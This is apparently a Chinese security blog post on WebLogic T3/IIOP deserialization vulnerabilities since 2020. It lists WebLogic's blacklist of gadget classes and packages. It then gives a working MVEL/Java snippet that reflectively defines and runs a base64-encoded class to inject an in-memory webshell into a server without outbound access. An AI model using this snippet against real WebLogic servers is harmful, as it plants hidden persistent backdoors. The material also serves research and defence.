Weblogic T3/IIOP Part DeserializVuls from 2020 to now

注:黑线代表调用链、红线为补丁修复、绿线代表新的补丁绕过方式

图片高清版本移步:https://www.processon.com/view/link/610276e7e0b34d496239a82b

放上目前的黑名单

Plain  Text private static final String[] DEFAULT_BLACKLIST_PACKAGES = new String[]{"org.apache.commons.collections.functors", "com.sun.org.apache.xalan.internal.xsltc.trax", "javassist", "java.rmi.activation", "sun.rmi.server", "com.bea.core.repackaged.springframework.aop.aspectj", "com.bea.core.repackaged.springframework.aop.aspectj.annotation", "com.bea.core.repackaged.springframework.aop.aspectj.autoproxy", "com.bea.core.repackaged.springframework.beans.factory.support", "org.python.core", "com.bea.core.repackaged.aspectj.weaver.tools.cache", "com.bea.core.repackaged.aspectj.weaver.tools", "com.bea.core.repackaged.aspectj.weaver.reflect", "com.bea.core.repackaged.aspectj.weaver", "com.oracle.wls.shaded.org.apache.xalan.xsltc.trax", "oracle.eclipselink.coherence.integrated.internal.querying", "oracle.eclipselink.coherence.integrated.internal.cache"}; private static final

String[] DEFAULT_BLACKLIST_CLASSES = new String[]{"org.codehaus.groovy.runtime.ConvertedClosure", "org.codehaus.groovy.runtime.ConversionHandler", "org.codehaus.groovy.runtime.MethodClosure", "org.springframework.transaction.support.AbstractPlatformTransactionManager", "java.rmi.server.UnicastRemoteObject", "java.rmi.server.RemoteObjectInvocationHandler", "com.bea.core.repackaged.springframework.transaction.support.AbstractPlatformTransactionManager", "java.rmi.server.RemoteObject", "com.tangosol.coherence.rest.util.extractor.MvelExtractor", "java.lang.Runtime", "oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor", "org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor", "org.eclipse.persistence.internal.descriptors.InstanceVariableAttributeAccessor", "org.apache.commons.fileupload.disk.DiskFileItem", "oracle.jdbc.pool.OraclePooledConnection"}; private static final String[]

DEFAULT_WLS_ONLY_BLACKLIST_PACKAGES = new String[]{"com.tangosol.internal.util.invoke", "com.tangosol.internal.util.invoke.lambda", "com.tangosol.util.extractor", "com.tangosol.coherence.rest.util.extractor", "com.tangosol.coherence.rest.util", "com.tangosol.coherence.component.application.console"}; private static final String[] DEFAULT_WLS_ONLY_BLACKLIST_CLASSES = new String[]{"com.tangosol.util.extractor.ReflectionExtractor", "com.tangosol.internal.util.SimpleBinaryEntry"};

Weblogic T3 注入内存马的实战利用

感谢@BeichenDream @r4v3zn

当目标不出网的情况下(dns fail),我们可采用回显或者注入内存马方式深入利用。

以MvelExtractor为例,某些漏洞支持执行Java代码,或者调用执行任意类的任意方法,此时我们将T3内存马注入关键代码的class类进行base64编码,然后在漏洞执行点执行以下代码:

Plain  Textvar loader = java.lang.Thread.currentThread().getContextClassLoader();var outputStream=new  java.io.ByteArrayOutputStream();outputStream.write(java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer("base64..........."));var def=java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", java.lang.Class.forName("[B"), java.lang.Integer.TYPE, java.lang.Integer.TYPE)def.setAccessible(true);var clazz=def.invoke(loader,outputStream.toByteArray(),0,outputStream.size());clazz.getMethod("main", java.lang.Class.forName("[Ljava.lang.String;")).invoke(null,null);

使用weblogic-framework连接即可

参考链接

https://mp.weixin.qq.com/s/XzlK__YljJ8x21sQkeqA_Q

https://mp.weixin.qq.com/s/wFHhWvnCLm1xcWZIbv6O3A

https://buaq.net/go-56072.html

https://forum.butian.net/share/41

https://paper.seebug.org/1280/#cve-2020-14645